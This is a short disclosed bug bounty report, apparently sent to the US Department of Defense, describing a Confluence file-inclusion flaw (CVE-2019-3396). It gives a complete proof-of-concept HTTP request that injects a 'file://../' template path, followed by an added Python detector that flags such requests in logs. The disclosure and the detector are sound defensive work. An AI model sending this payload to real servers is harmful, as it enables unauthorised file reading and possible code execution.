LFI with potential to RCE on ██████ using CVE-2019-3396

Disclosed: 2019-10-04 15:17:21 By nahamsec To deptofdefense
High
Vulnerability Details
# POC

```
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: ██████
Content-Type: application/json
Content-Length: 174

{"contentId":"12345","macro":{"name":"widget","body":"","params":{"url":"https://www.youtube.com/watch?v=wHEHYJpCkpg","width":"300","height":"200","_template":"file://../"}}}
```

Thanks,
Ben

## Impact
Report Stats
  • Report ID: 538771
  • State: Closed
  • Substate: resolved
  • Upvotes: 53
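
A defender-side check for the request shape shown in the report, as an added example that is not part of the original report: it classifies logged requests to the macro preview endpoint by whether the body carries a `_template` parameter. The record layout, function names and verdict labels are hypothetical, and it assumes ordinary editor preview requests do not set `_template` themselves.

```python
import json
import re

PREVIEW_PATH = "/rest/tinymce/1/macro/preview"  # endpoint from the report
# URL scheme prefix (file:, https:, ...) or a parent-directory segment.
RISKY = re.compile(r"^[a-z][a-z0-9+.\-]*:|(^|[\\/])\.\.([\\/]|$)", re.I)

def classify(method, path, body):
    """Return 'ignore', 'ok', 'suspicious' or 'alert' for one logged request."""
    route = path.split("?", 1)[0].rstrip("/")
    # endswith() tolerates a context path such as /wiki in front of /rest/...
    if method.upper() != "POST" or not route.endswith(PREVIEW_PATH):
        return "ignore"
    try:
        doc = json.loads(body)
    except (TypeError, ValueError):
        return "suspicious"  # unparsable body sent to the preview endpoint
    macro = doc.get("macro") if isinstance(doc, dict) else None
    params = macro.get("params") if isinstance(macro, dict) else None
    if not isinstance(params, dict) or "_template" not in params:
        return "ok"
    # Assumption: any client-supplied _template deserves review; one that
    # names a scheme or walks up a directory is escalated to an alert.
    return "alert" if RISKY.search(str(params["_template"])) else "suspicious"

# Constructed sample records (method, path, body); not real traffic.
SAMPLES = [
    ("POST", PREVIEW_PATH,
     '{"contentId":"12345","macro":{"name":"widget","body":"","params":'
     '{"url":"https://www.youtube.com/watch?v=wHEHYJpCkpg","_template":"file://../"}}}'),
    ("POST", "/wiki" + PREVIEW_PATH,
     '{"contentId":"1","macro":{"name":"widget","params":{"url":"https://example.invalid/v"}}}'),
    ("POST", PREVIEW_PATH,
     '{"contentId":"1","macro":{"name":"widget","params":{"_template":"custom.vm"}}}'),
    ("GET", "/login.action", ""),
]

def scan(records):
    """Classify every record, preserving input order."""
    return [classify(*rec) for rec in records]

if __name__ == "__main__":
    for rec, verdict in zip(SAMPLES, scan(SAMPLES)):
        print(verdict, rec[0], rec[1])
```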